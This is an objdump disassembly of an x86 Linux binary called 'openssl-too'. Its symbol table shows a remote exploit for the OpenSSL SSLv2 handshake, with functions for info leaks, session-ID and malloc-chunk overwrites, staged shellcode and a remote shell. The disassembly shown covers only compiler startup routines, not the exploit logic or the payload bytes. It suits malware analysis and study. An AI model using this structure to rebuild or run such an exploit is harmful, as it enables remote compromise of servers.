FILE REFERENCED


openssl-too:     file format elf32-i386
openssl-too
architecture: i386, flags 0x00000112:
EXEC_P, HAS_SYMS, D_PAGED
start address 0x08048ee0

Program Header:
    PHDR off    0x00000034 vaddr 0x08048034 paddr 0x08048034 align 2**2
         filesz 0x000000c0 memsz 0x000000c0 flags r-x
  INTERP off    0x000000f4 vaddr 0x080480f4 paddr 0x080480f4 align 2**0
         filesz 0x00000013 memsz 0x00000013 flags r--
    LOAD off    0x00000000 vaddr 0x08048000 paddr 0x08048000 align 2**12
         filesz 0x00004fe0 memsz 0x00004fe0 flags r-x
    LOAD off    0x00004fe0 vaddr 0x0804dfe0 paddr 0x0804dfe0 align 2**12
         filesz 0x000004dc memsz 0x00000934 flags rw-
 DYNAMIC off    0x000053ec vaddr 0x0804e3ec paddr 0x0804e3ec align 2**2
         filesz 0x000000d0 memsz 0x000000d0 flags rw-
    NOTE off    0x00000108 vaddr 0x08048108 paddr 0x08048108 align 2**2
         filesz 0x00000020 memsz 0x00000020 flags r--

Dynamic Section:
  NEEDED      libcrypto.so.2
  NEEDED      libc.so.6
  INIT        0x8048b94
  FINI        0x804b6f0
  HASH        0x8048128
  STRTAB      0x80486c4
  SYMTAB      0x80482c4
  STRSZ       0x251
  SYMENT      0x10
  DEBUG       0x0
  PLTGOT      0x804e314
  PLTRELSZ    0x190
  PLTREL      0x11
  JMPREL      0x8048a04
  REL         0x80489dc
  RELSZ       0x28
  RELENT      0x8
  VERNEED     0x80489ac
  VERNEEDNUM  0x1
  VERSYM      0x804892c

Version References:
  required from libc.so.6:
    0x09691f73 0x00 03 GLIBC_2.1.3
    0x0d696910 0x00 02 GLIBC_2.0

Sections:
Idx Name          Size      VMA       LMA       File off  Algn
  0 .interp       00000013  080480f4  080480f4  000000f4  2**0
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  1 .note.ABI-tag 00000020  08048108  08048108  00000108  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  2 .hash         0000019c  08048128  08048128  00000128  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  3 .dynsym       00000400  080482c4  080482c4  000002c4  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  4 .dynstr       00000267  080486c4  080486c4  000006c4  2**0
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  5 .gnu.version  00000080  0804892c  0804892c  0000092c  2**1
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  6 .gnu.version_r 00000030  080489ac  080489ac  000009ac  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  7 .rel.dyn      00000028  080489dc  080489dc  000009dc  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  8 .rel.plt      00000190  08048a04  08048a04  00000a04  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  9 .init         00000018  08048b94  08048b94  00000b94  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
 10 .plt          00000330  08048bac  08048bac  00000bac  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
 11 .text         00002810  08048ee0  08048ee0  00000ee0  2**4
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
 12 .fini         0000001e  0804b6f0  0804b6f0  000036f0  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
 13 .rodata       000018c0  0804b720  0804b720  00003720  2**5
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
 14 .data         00000320  0804dfe0  0804dfe0  00004fe0  2**5
                  CONTENTS, ALLOC, LOAD, DATA
 15 .eh_frame     00000004  0804e300  0804e300  00005300  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 16 .ctors        00000008  0804e304  0804e304  00005304  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 17 .dtors        00000008  0804e30c  0804e30c  0000530c  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 18 .got          000000d8  0804e314  0804e314  00005314  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 19 .dynamic      000000d0  0804e3ec  0804e3ec  000053ec  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 20 .sbss         00000000  0804e4bc  0804e4bc  000054c0  2**0
                  CONTENTS
 21 .bss          00000454  0804e4c0  0804e4c0  000054c0  2**5
                  ALLOC
 22 .stab         00006618  00000000  00000000  000054c0  2**2
                  CONTENTS, READONLY, DEBUGGING
 23 .stabstr      0001030c  00000000  00000000  0000bad8  2**0
                  CONTENTS, READONLY, DEBUGGING
 24 .comment      000001b0  00000000  00000000  0001bde4  2**0
                  CONTENTS, READONLY
 25 .note         000000a0  00000000  00000000  0001bf94  2**0
                  CONTENTS, READONLY
SYMBOL TABLE:
080480f4 l    d  .interp	00000000              
08048108 l    d  .note.ABI-tag	00000000              
08048128 l    d  .hash	00000000              
080482c4 l    d  .dynsym	00000000              
080486c4 l    d  .dynstr	00000000              
0804892c l    d  .gnu.version	00000000              
080489ac l    d  .gnu.version_r	00000000              
080489dc l    d  .rel.dyn	00000000              
08048a04 l    d  .rel.plt	00000000              
08048b94 l    d  .init	00000000              
08048bac l    d  .plt	00000000              
08048ee0 l    d  .text	00000000              
0804b6f0 l    d  .fini	00000000              
0804b720 l    d  .rodata	00000000              
0804dfe0 l    d  .data	00000000              
0804e300 l    d  .eh_frame	00000000              
0804e304 l    d  .ctors	00000000              
0804e30c l    d  .dtors	00000000              
0804e314 l    d  .got	00000000              
0804e3ec l    d  .dynamic	00000000              
0804e4bc l    d  .sbss	00000000              
0804e4c0 l    d  .bss	00000000              
00000000 l    d  .stab	00000000              
00000000 l    d  .stabstr	00000000              
00000000 l    d  .comment	00000000              
00000000 l    d  .note	00000000              
00000000 l    d  *ABS*	00000000              
00000000 l    d  *ABS*	00000000              
00000000 l    d  *ABS*	00000000              
00000000 l    df *ABS*	00000000              initfini.c
08048f04 l       .text	00000000              gcc2_compiled.
08048f04 l     F .text	00000000              call_gmon_start
00000000 l    df *ABS*	00000000              init.c
00000000 l    df *ABS*	00000000              crtstuff.c
08048f30 l       .text	00000000              gcc2_compiled.
0804dfe8 l     O .data	00000000              p.0
0804e30c l     O .dtors	00000000              __DTOR_LIST__
0804dfec l     O .data	00000000              completed.1
08048f30 l     F .text	00000000              __do_global_dtors_aux
0804e300 l     O .eh_frame	00000000              __EH_FRAME_BEGIN__
08048f90 l     F .text	00000000              fini_dummy
0804e4d0 l     O .bss	00000018              object.2
08048fa0 l     F .text	00000000              frame_dummy
08048fd0 l     F .text	00000000              init_dummy
0804dff0 l     O .data	00000000              force_to_data
0804e304 l     O .ctors	00000000              __CTOR_LIST__
00000000 l    df *ABS*	00000000              crtstuff.c
0804b6b0 l       .text	00000000              gcc2_compiled.
0804b6b0 l     F .text	00000000              __do_global_ctors_aux
0804e308 l     O .ctors	00000000              __CTOR_END__
0804b6e0 l     F .text	00000000              init_dummy
0804e300 l     O .data	00000000              force_to_data
0804e310 l     O .dtors	00000000              __DTOR_END__
0804e300 l     O .eh_frame	00000000              __FRAME_END__
00000000 l    df *ABS*	00000000              initfini.c
0804b6f0 l       .text	00000000              gcc2_compiled.
00000000 l    df *ABS*	00000000              main.c
00000000 l    df *ABS*	00000000              ssl2.c
00000000 l    df *ABS*	00000000              linux-x86.c
08048bbc       F *UND*	00000051              usleep@@GLIBC_2.0
0804e500 g     O .bss	000003fc              conn
08048bcc       F *UND*	00000007              ntohl@@GLIBC_2.0
0804aed4 g     F .text	000000c6              generate_key_material
0804b530 g     F .text	00000176              build_shellcode_linux_x86
0804e3ec g     O *ABS*	00000000              _DYNAMIC
0804a074 g     F .text	000000b4              ssl_connect_host
08048bdc  w    F *UND*	00000081              __register_frame_info@@GLIBC_2.0
0804a154 g     F .text	000000d9              ssl_error
08048bec       F *UND*	00000040              write@@GLIBC_2.0
08048bfc       F *UND*	0000003e              fileno@@GLIBC_2.0
080497d8 g     F .text	000000fa              usage
08048c0c       F *UND*	0000003a              close@@GLIBC_2.0
0804b720 g       .rodata	00000004              _fp_hw
0804e100 g     O .data	00000042              shellcode_stage1_linux_x86
08048fe0 g     F .text	0000032b              sh
08048c1c       F *UND*	00000103              fflush@@GLIBC_2.0
08048c2c       F *UND*	0000004c              select@@GLIBC_2.0
0804e8fc g     O .bss	00000004              max_conns
08048c3c       F *UND*	00000031              strerror@@GLIBC_2.0
0804b3e4 g     F .text	0000007a              get_server_error
08048c4c       F *UND*	0000014a              RC4_set_key
0804a2bc g     F .text	00000283              read_ssl_packet
08048c5c       F *UND*	00000036              X509_get_pubkey
0804e900 g     O .bss	00000004              conn_count
08048c6c       F *UND*	00000018              __errno_location@@GLIBC_2.0
08049418 g     F .text	000003bf              send_shellcode
0804e1a0 g     O .data	00000039              overwrite_session_id_length_linux_x86
08048c7c       F *UND*	00000105              inet_ntoa@@GLIBC_2.0
08048b94 g     F .init	00000000              _init
08048c8c       F *UND*	00000270              malloc@@GLIBC_2.0
0804e1e0 g     O .data	000000d1              overwrite_next_malloc_chunk_linux_x86
0804b1cc g     F .text	00000080              send_client_finished
08048c9c       F *UND*	00000100              memmove@@GLIBC_2.0
08048cac       F *UND*	000003be              RC4
08048cbc  w    F *UND*	000000ac              __deregister_frame_info@@GLIBC_2.0
0804dff0 g     O .data	00000108              systems
0804e4c0 g     O .bss	00000004              stdout@@GLIBC_2.0
0804a818 g     F .text	00000451              get_server_hello
08048ee0 g     F .text	00000000              _start
08048ccc       F *UND*	00000033              getopt@@GLIBC_2.0
08048cdc       F *UND*	00000140              fgets@@GLIBC_2.0
08048cec       F *UND*	00000038              MD5_Init
08048cfc       F *UND*	0000000e              ntohs@@GLIBC_2.0
0804af9c g     F .text	000000bb              generate_session_keys
08048d0c       F *UND*	00000149              fputs@@GLIBC_2.0
08048d1c       F *UND*	000000bb              strlen@@GLIBC_2.0
08048d2c       F *UND*	000001da              sleep@@GLIBC_2.0
0804a230 g     F .text	00000089              read_data
0804b24c g     F .text	00000195              get_server_finished
08048d3c       F *UND*	0000003e              RSA_public_encrypt
08048d4c       F *UND*	00000169              MD5_Final
0804a540 g     F .text	00000204              send_ssl_packet
0804e2c0 g     O .data	00000028              arch_linux_x86
0804b4c8 g     F .text	00000067              get_ciphers_linux_x86
0804e904 g     O .bss	00000010              ssl_conns
0804e160 g     O .data	00000038              shellcode_stage2_linux_x86
08048d5c       F *UND*	0000001e              memcmp@@GLIBC_2.0
0804e4bc g     O *ABS*	00000000              __bss_start
08049f38 g     F .text	0000007f              get_local_port
080498d4 g     F .text	00000662              main
0804a744 g     F .text	000000d2              send_client_hello
08048d6c       F *UND*	000000ca              __libc_start_main@@GLIBC_2.0
08048d7c       F *UND*	000001aa              strcat@@GLIBC_2.0
0804b058 g     F .text	00000173              get_server_verify
0804dfe0  w      .data	00000000              data_start
08048d8c       F *UND*	00000032              printf@@GLIBC_2.0
0804b6f0 g     F .fini	00000000              _fini
08048d9c       F *UND*	00000071              memcpy@@GLIBC_2.0
08048dac       F *UND*	0000003d              getsockname@@GLIBC_2.0
08048dbc  w    F *UND*	0000009d              __cxa_finalize@@GLIBC_2.1.3
08048dcc       F *UND*	00000067              srand@@GLIBC_2.0
08048ddc       F *UND*	000001b7              gethostbyname@@GLIBC_2.0
08048dec       F *UND*	00000058              bzero@@GLIBC_2.0
0804930c g     F .text	0000010b              info_leak
08048dfc       F *UND*	00000105              exit@@GLIBC_2.0
08048e0c       F *UND*	0000002b              atoi@@GLIBC_2.0
08048e1c       F *UND*	0000002d              sscanf@@GLIBC_2.0
0804e4bc g     O *ABS*	00000000              _edata
0804e314 g     O *ABS*	00000000              _GLOBAL_OFFSET_TABLE_
08048e2c       F *UND*	000000f4              free@@GLIBC_2.0
0804e914 g     O *ABS*	00000000              _end
08048e3c       F *UND*	0000003d              send@@GLIBC_2.0
08048e4c       F *UND*	0000000e              htons@@GLIBC_2.0
08048e5c       F *UND*	0000003d              connect@@GLIBC_2.0
0804e4c4 g     O .bss	00000004              stdin@@GLIBC_2.0
0804b460 g     F .text	00000067              get_cipher_linux_x86
0804a128 g     F .text	0000002b              ssl_close
0804e4c8 g     O .bss	00000004              optarg@@GLIBC_2.0
0804b724 g     O .rodata	00000004              _IO_stdin_used
08049fb8 g     F .text	000000bb              connect_host
08048e6c       F *UND*	0000002d              sprintf@@GLIBC_2.0
0804ac6c g     F .text	00000266              send_client_master_key
0804dfe0 g       .data	00000000              __data_start
08048e7c       F *UND*	0000003d              socket@@GLIBC_2.0
08048e8c       F *UND*	000001e7              d2i_X509
08048e9c       F *UND*	0000001b              rand@@GLIBC_2.0
0804e4cc g     O .bss	00000004              optind@@GLIBC_2.0
08048eac       F *UND*	00000355              MD5_Update
08048ebc       F *UND*	00000040              read@@GLIBC_2.0
00000000  w      *UND*	00000000              __gmon_start__
08048ecc       F *UND*	0000008b              strcpy@@GLIBC_2.0


DYNAMIC SYMBOL TABLE:
08048bbc      DF *UND*	00000051  GLIBC_2.0   usleep
08048bcc      DF *UND*	00000007  GLIBC_2.0   ntohl
0804e3ec g    DO *ABS*	00000000  Base        _DYNAMIC
08048bdc  w   DF *UND*	00000081  GLIBC_2.0   __register_frame_info
08048bec      DF *UND*	00000040  GLIBC_2.0   write
08048bfc      DF *UND*	0000003e  GLIBC_2.0   fileno
08048c0c      DF *UND*	0000003a  GLIBC_2.0   close
08048c1c      DF *UND*	00000103  GLIBC_2.0   fflush
08048c2c      DF *UND*	0000004c  GLIBC_2.0   select
08048c3c      DF *UND*	00000031  GLIBC_2.0   strerror
08048c4c      DF *UND*	0000014a              RC4_set_key
08048c5c      DF *UND*	00000036              X509_get_pubkey
08048c6c      DF *UND*	00000018  GLIBC_2.0   __errno_location
08048c7c      DF *UND*	00000105  GLIBC_2.0   inet_ntoa
08048b94 g    DF .init	00000000  Base        _init
08048c8c      DF *UND*	00000270  GLIBC_2.0   malloc
08048c9c      DF *UND*	00000100  GLIBC_2.0   memmove
08048cac      DF *UND*	000003be              RC4
08048cbc  w   DF *UND*	000000ac  GLIBC_2.0   __deregister_frame_info
0804e4c0 g    DO .bss	00000004  GLIBC_2.0   stdout
08048ccc      DF *UND*	00000033  GLIBC_2.0   getopt
08048cdc      DF *UND*	00000140  GLIBC_2.0   fgets
08048cec      DF *UND*	00000038              MD5_Init
08048cfc      DF *UND*	0000000e  GLIBC_2.0   ntohs
08048d0c      DF *UND*	00000149  GLIBC_2.0   fputs
08048d1c      DF *UND*	000000bb  GLIBC_2.0   strlen
08048d2c      DF *UND*	000001da  GLIBC_2.0   sleep
08048d3c      DF *UND*	0000003e              RSA_public_encrypt
08048d4c      DF *UND*	00000169              MD5_Final
08048d5c      DF *UND*	0000001e  GLIBC_2.0   memcmp
0804e4bc g    DO *ABS*	00000000  Base        __bss_start
08048d6c      DF *UND*	000000ca  GLIBC_2.0   __libc_start_main
08048d7c      DF *UND*	000001aa  GLIBC_2.0   strcat
08048d8c      DF *UND*	00000032  GLIBC_2.0   printf
0804b6f0 g    DF .fini	00000000  Base        _fini
08048d9c      DF *UND*	00000071  GLIBC_2.0   memcpy
08048dac      DF *UND*	0000003d  GLIBC_2.0   getsockname
08048dbc  w   DF *UND*	0000009d  GLIBC_2.1.3 __cxa_finalize
08048dcc      DF *UND*	00000067  GLIBC_2.0   srand
08048ddc      DF *UND*	000001b7  GLIBC_2.0   gethostbyname
08048dec      DF *UND*	00000058  GLIBC_2.0   bzero
08048dfc      DF *UND*	00000105  GLIBC_2.0   exit
08048e0c      DF *UND*	0000002b  GLIBC_2.0   atoi
08048e1c      DF *UND*	0000002d  GLIBC_2.0   sscanf
0804e4bc g    DO *ABS*	00000000  Base        _edata
0804e314 g    DO *ABS*	00000000  Base        _GLOBAL_OFFSET_TABLE_
08048e2c      DF *UND*	000000f4  GLIBC_2.0   free
0804e914 g    DO *ABS*	00000000  Base        _end
08048e3c      DF *UND*	0000003d  GLIBC_2.0   send
08048e4c      DF *UND*	0000000e  GLIBC_2.0   htons
08048e5c      DF *UND*	0000003d  GLIBC_2.0   connect
0804e4c4 g    DO .bss	00000004  GLIBC_2.0   stdin
0804e4c8 g    DO .bss	00000004  GLIBC_2.0   optarg
0804b724 g    DO .rodata	00000004  Base        _IO_stdin_used
08048e6c      DF *UND*	0000002d  GLIBC_2.0   sprintf
08048e7c      DF *UND*	0000003d  GLIBC_2.0   socket
08048e8c      DF *UND*	000001e7              d2i_X509
08048e9c      DF *UND*	0000001b  GLIBC_2.0   rand
0804e4cc g    DO .bss	00000004  GLIBC_2.0   optind
08048eac      DF *UND*	00000355              MD5_Update
08048ebc      DF *UND*	00000040  GLIBC_2.0   read
00000000  w   D  *UND*	00000000              __gmon_start__
08048ecc      DF *UND*	0000008b  GLIBC_2.0   strcpy


Disassembly of section .init:
08048b94 <_init> push   %ebp
08048b95 <_init+0x1> mov    %esp,%ebp
08048b97 <_init+0x3> sub    $0x8,%esp
08048b9a <_init+0x6> call   08048f04 <call_gmon_start>
08048b9f <_init+0xb> nop    
08048ba0 <_init+0xc> call   08048fa0 <frame_dummy>
08048ba5 <_init+0x11> call   0804b6b0 <__do_global_ctors_aux>
08048baa <_init+0x16> leave  
08048bab <_init+0x17> ret    
Disassembly of section .plt:
08048bac <.plt> pushl  0x804e318
08048bb2 <.plt+0x6> jmp    *0x804e31c
08048bb8 <.plt+0xc> add    %al,(%eax)
08048bba <.plt+0xe> add    %al,(%eax)
08048bbc <.plt+0x10> jmp    *0x804e320
08048bc2 <.plt+0x16> push   $0x0
08048bc7 <.plt+0x1b> jmp    08048bac <_init+0x18>
08048bcc <.plt+0x20> jmp    *0x804e324
08048bd2 <.plt+0x26> push   $0x8
08048bd7 <.plt+0x2b> jmp    08048bac <_init+0x18>
08048bdc <.plt+0x30> jmp    *0x804e328
08048be2 <.plt+0x36> push   $0x10
08048be7 <.plt+0x3b> jmp    08048bac <_init+0x18>
08048bec <.plt+0x40> jmp    *0x804e32c
08048bf2 <.plt+0x46> push   $0x18
08048bf7 <.plt+0x4b> jmp    08048bac <_init+0x18>
08048bfc <.plt+0x50> jmp    *0x804e330
08048c02 <.plt+0x56> push   $0x20
08048c07 <.plt+0x5b> jmp    08048bac <_init+0x18>
08048c0c <.plt+0x60> jmp    *0x804e334
08048c12 <.plt+0x66> push   $0x28
08048c17 <.plt+0x6b> jmp    08048bac <_init+0x18>
08048c1c <.plt+0x70> jmp    *0x804e338
08048c22 <.plt+0x76> push   $0x30
08048c27 <.plt+0x7b> jmp    08048bac <_init+0x18>
08048c2c <.plt+0x80> jmp    *0x804e33c
08048c32 <.plt+0x86> push   $0x38
08048c37 <.plt+0x8b> jmp    08048bac <_init+0x18>
08048c3c <.plt+0x90> jmp    *0x804e340
08048c42 <.plt+0x96> push   $0x40
08048c47 <.plt+0x9b> jmp    08048bac <_init+0x18>
08048c4c <.plt+0xa0> jmp    *0x804e344
08048c52 <.plt+0xa6> push   $0x48
08048c57 <.plt+0xab> jmp    08048bac <_init+0x18>
08048c5c <.plt+0xb0> jmp    *0x804e348
08048c62 <.plt+0xb6> push   $0x50
08048c67 <.plt+0xbb> jmp    08048bac <_init+0x18>
08048c6c <.plt+0xc0> jmp    *0x804e34c
08048c72 <.plt+0xc6> push   $0x58
08048c77 <.plt+0xcb> jmp    08048bac <_init+0x18>
08048c7c <.plt+0xd0> jmp    *0x804e350
08048c82 <.plt+0xd6> push   $0x60
08048c87 <.plt+0xdb> jmp    08048bac <_init+0x18>
08048c8c <.plt+0xe0> jmp    *0x804e354
08048c92 <.plt+0xe6> push   $0x68
08048c97 <.plt+0xeb> jmp    08048bac <_init+0x18>
08048c9c <.plt+0xf0> jmp    *0x804e358
08048ca2 <.plt+0xf6> push   $0x70
08048ca7 <.plt+0xfb> jmp    08048bac <_init+0x18>
08048cac <.plt+0x100> jmp    *0x804e35c
08048cb2 <.plt+0x106> push   $0x78
08048cb7 <.plt+0x10b> jmp    08048bac <_init+0x18>
08048cbc <.plt+0x110> jmp    *0x804e360
08048cc2 <.plt+0x116> push   $0x80
08048cc7 <.plt+0x11b> jmp    08048bac <_init+0x18>
08048ccc <.plt+0x120> jmp    *0x804e364
08048cd2 <.plt+0x126> push   $0x88
08048cd7 <.plt+0x12b> jmp    08048bac <_init+0x18>
08048cdc <.plt+0x130> jmp    *0x804e368
08048ce2 <.plt+0x136> push   $0x90
08048ce7 <.plt+0x13b> jmp    08048bac <_init+0x18>
08048cec <.plt+0x140> jmp    *0x804e36c
08048cf2 <.plt+0x146> push   $0x98
08048cf7 <.plt+0x14b> jmp    08048bac <_init+0x18>
08048cfc <.plt+0x150> jmp    *0x804e370
08048d02 <.plt+0x156> push   $0xa0
08048d07 <.plt+0x15b> jmp    08048bac <_init+0x18>
08048d0c <.plt+0x160> jmp    *0x804e374
08048d12 <.plt+0x166> push   $0xa8
08048d17 <.plt+0x16b> jmp    08048bac <_init+0x18>
08048d1c <.plt+0x170> jmp    *0x804e378
08048d22 <.plt+0x176> push   $0xb0
08048d27 <.plt+0x17b> jmp    08048bac <_init+0x18>
08048d2c <.plt+0x180> jmp    *0x804e37c
08048d32 <.plt+0x186> push   $0xb8
08048d37 <.plt+0x18b> jmp    08048bac <_init+0x18>
08048d3c <.plt+0x190> jmp    *0x804e380
08048d42 <.plt+0x196> push   $0xc0
08048d47 <.plt+0x19b> jmp    08048bac <_init+0x18>
08048d4c <.plt+0x1a0> jmp    *0x804e384
08048d52 <.plt+0x1a6> push   $0xc8
08048d57 <.plt+0x1ab> jmp    08048bac <_init+0x18>
08048d5c <.plt+0x1b0> jmp    *0x804e388
08048d62 <.plt+0x1b6> push   $0xd0
08048d67 <.plt+0x1bb> jmp    08048bac <_init+0x18>
08048d6c <.plt+0x1c0> jmp    *0x804e38c
08048d72 <.plt+0x1c6> push   $0xd8
08048d77 <.plt+0x1cb> jmp    08048bac <_init+0x18>
08048d7c <.plt+0x1d0> jmp    *0x804e390
08048d82 <.plt+0x1d6> push   $0xe0
08048d87 <.plt+0x1db> jmp    08048bac <_init+0x18>
08048d8c <.plt+0x1e0> jmp    *0x804e394
08048d92 <.plt+0x1e6> push   $0xe8
08048d97 <.plt+0x1eb> jmp    08048bac <_init+0x18>
08048d9c <.plt+0x1f0> jmp    *0x804e398
08048da2 <.plt+0x1f6> push   $0xf0
08048da7 <.plt+0x1fb> jmp    08048bac <_init+0x18>
08048dac <.plt+0x200> jmp    *0x804e39c
08048db2 <.plt+0x206> push   $0xf8
08048db7 <.plt+0x20b> jmp    08048bac <_init+0x18>
08048dbc <.plt+0x210> jmp    *0x804e3a0
08048dc2 <.plt+0x216> push   $0x100
08048dc7 <.plt+0x21b> jmp    08048bac <_init+0x18>
08048dcc <.plt+0x220> jmp    *0x804e3a4
08048dd2 <.plt+0x226> push   $0x108
08048dd7 <.plt+0x22b> jmp    08048bac <_init+0x18>
08048ddc <.plt+0x230> jmp    *0x804e3a8
08048de2 <.plt+0x236> push   $0x110
08048de7 <.plt+0x23b> jmp    08048bac <_init+0x18>
08048dec <.plt+0x240> jmp    *0x804e3ac
08048df2 <.plt+0x246> push   $0x118
08048df7 <.plt+0x24b> jmp    08048bac <_init+0x18>
08048dfc <.plt+0x250> jmp    *0x804e3b0
08048e02 <.plt+0x256> push   $0x120
08048e07 <.plt+0x25b> jmp    08048bac <_init+0x18>
08048e0c <.plt+0x260> jmp    *0x804e3b4
08048e12 <.plt+0x266> push   $0x128
08048e17 <.plt+0x26b> jmp    08048bac <_init+0x18>
08048e1c <.plt+0x270> jmp    *0x804e3b8
08048e22 <.plt+0x276> push   $0x130
08048e27 <.plt+0x27b> jmp    08048bac <_init+0x18>
08048e2c <.plt+0x280> jmp    *0x804e3bc
08048e32 <.plt+0x286> push   $0x138
08048e37 <.plt+0x28b> jmp    08048bac <_init+0x18>
08048e3c <.plt+0x290> jmp    *0x804e3c0
08048e42 <.plt+0x296> push   $0x140
08048e47 <.plt+0x29b> jmp    08048bac <_init+0x18>
08048e4c <.plt+0x2a0> jmp    *0x804e3c4
08048e52 <.plt+0x2a6> push   $0x148
08048e57 <.plt+0x2ab> jmp    08048bac <_init+0x18>
08048e5c <.plt+0x2b0> jmp    *0x804e3c8
08048e62 <.plt+0x2b6> push   $0x150
08048e67 <.plt+0x2bb> jmp    08048bac <_init+0x18>
08048e6c <.plt+0x2c0> jmp    *0x804e3cc
08048e72 <.plt+0x2c6> push   $0x158
08048e77 <.plt+0x2cb> jmp    08048bac <_init+0x18>
08048e7c <.plt+0x2d0> jmp    *0x804e3d0
08048e82 <.plt+0x2d6> push   $0x160
08048e87 <.plt+0x2db> jmp    08048bac <_init+0x18>
08048e8c <.plt+0x2e0> jmp    *0x804e3d4
08048e92 <.plt+0x2e6> push   $0x168
08048e97 <.plt+0x2eb> jmp    08048bac <_init+0x18>
08048e9c <.plt+0x2f0> jmp    *0x804e3d8
08048ea2 <.plt+0x2f6> push   $0x170
08048ea7 <.plt+0x2fb> jmp    08048bac <_init+0x18>
08048eac <.plt+0x300> jmp    *0x804e3dc
08048eb2 <.plt+0x306> push   $0x178
08048eb7 <.plt+0x30b> jmp    08048bac <_init+0x18>
08048ebc <.plt+0x310> jmp    *0x804e3e0
08048ec2 <.plt+0x316> push   $0x180
08048ec7 <.plt+0x31b> jmp    08048bac <_init+0x18>
08048ecc <.plt+0x320> jmp    *0x804e3e4
08048ed2 <.plt+0x326> push   $0x188
08048ed7 <.plt+0x32b> jmp    08048bac <_init+0x18>
Disassembly of section .text:

---- Function : _start ----
08048ee0 <_start> xor    %ebp,%ebp
08048ee2 <_start+0x2> pop    %esi
08048ee3 <_start+0x3> mov    %esp,%ecx
08048ee5 <_start+0x5> and    $0xfffffff0,%esp
08048ee8 <_start+0x8> push   %eax
08048ee9 <_start+0x9> push   %esp
08048eea <_start+0xa> push   %edx
08048eeb <_start+0xb> push   $0x804b6f0
08048ef0 <_start+0x10> push   $0x8048b94
08048ef5 <_start+0x15> push   %ecx
08048ef6 <_start+0x16> push   %esi
08048ef7 <_start+0x17> push   $0x80498d4
08048efc <_start+0x1c> call   08048d6c <_init+0x1d8>
08048f01 <_start+0x21> hlt    
08048f02 <_start+0x22> mov    %esi,%esi

---- Function : call_gmon_start ----
08048f04 <call_gmon_start> push   %ebp
08048f05 <call_gmon_start+0x1> mov    %esp,%ebp
08048f07 <call_gmon_start+0x3> push   %ebx
08048f08 <call_gmon_start+0x4> push   %eax
08048f09 <call_gmon_start+0x5> call   08048f0e <call_gmon_start+0xa>

Referenced from call at 08048f09 ; 

08048f0e <call_gmon_start+0xa> pop    %ebx
08048f0f <call_gmon_start+0xb> add    $0x5406,%ebx
08048f15 <call_gmon_start+0x11> mov    0xd4(%ebx),%eax
08048f1b <call_gmon_start+0x17> test   %eax,%eax
08048f1d <call_gmon_start+0x19> je     08048f21 <call_gmon_start+0x1d>
08048f1f <call_gmon_start+0x1b> call   *%eax

Referenced from jump at 08048f1d ; 

08048f21 <call_gmon_start+0x1d> mov    0xfffffffc(%ebp),%ebx
08048f24 <call_gmon_start+0x20> leave  
08048f25 <call_gmon_start+0x21> ret    
08048f26 <call_gmon_start+0x22> mov    %esi,%esi
08048f28 <call_gmon_start+0x24> nop    
08048f29 <call_gmon_start+0x25> nop    
08048f2a <call_gmon_start+0x26> nop    
08048f2b <call_gmon_start+0x27> nop    
08048f2c <call_gmon_start+0x28> nop    
08048f2d <call_gmon_start+0x29> nop    
08048f2e <call_gmon_start+0x2a> nop    
08048f2f <call_gmon_start+0x2b> nop    

---- Function : __do_global_dtors_aux ----

Referenced from call at 0804b704 ; 

08048f30 <__do_global_dtors_aux> push   %ebp
08048f31 <__do_global_dtors_aux+0x1> mov    %esp,%ebp
08048f33 <__do_global_dtors_aux+0x3> sub    $0x8,%esp
08048f36 <__do_global_dtors_aux+0x6> mov    0x804dfec,%edx
08048f3c <__do_global_dtors_aux+0xc> test   %edx,%edx
08048f3e <__do_global_dtors_aux+0xe> jne    08048f89 <__do_global_dtors_aux+0x59>
08048f40 <__do_global_dtors_aux+0x10> mov    0x804dfe8,%edx
08048f46 <__do_global_dtors_aux+0x16> mov    (%edx),%eax
08048f48 <__do_global_dtors_aux+0x18> test   %eax,%eax
08048f4a <__do_global_dtors_aux+0x1a> je     08048f66 <__do_global_dtors_aux+0x36>
08048f4c <__do_global_dtors_aux+0x1c> lea    0x0(%esi,1),%esi

Referenced from jump at 08048f64 ; 

08048f50 <__do_global_dtors_aux+0x20> lea    0x4(%edx),%eax
08048f53 <__do_global_dtors_aux+0x23> mov    %eax,0x804dfe8
08048f58 <__do_global_dtors_aux+0x28> call   *(%edx)
08048f5a <__do_global_dtors_aux+0x2a> mov    0x804dfe8,%edx
08048f60 <__do_global_dtors_aux+0x30> mov    (%edx),%ecx
08048f62 <__do_global_dtors_aux+0x32> test   %ecx,%ecx
08048f64 <__do_global_dtors_aux+0x34> jne    08048f50 <__do_global_dtors_aux+0x20>

Referenced from jump at 08048f4a ; 

08048f66 <__do_global_dtors_aux+0x36> mov    $0x8048cbc,%eax
08048f6b <__do_global_dtors_aux+0x3b> test   %eax,%eax
08048f6d <__do_global_dtors_aux+0x3d> je     08048f7f <__do_global_dtors_aux+0x4f>
08048f6f <__do_global_dtors_aux+0x3f> sub    $0xc,%esp
08048f72 <__do_global_dtors_aux+0x42> push   $0x804e300
08048f77 <__do_global_dtors_aux+0x47> call   08048cbc <_init+0x128>
08048f7c <__do_global_dtors_aux+0x4c> add    $0x10,%esp

Referenced from jump at 08048f6d ; 

08048f7f <__do_global_dtors_aux+0x4f> mov    $0x1,%eax
08048f84 <__do_global_dtors_aux+0x54> mov    %eax,0x804dfec

Referenced from jump at 08048f3e ; 

08048f89 <__do_global_dtors_aux+0x59> mov    %ebp,%esp
08048f8b <__do_global_dtors_aux+0x5b> pop    %ebp
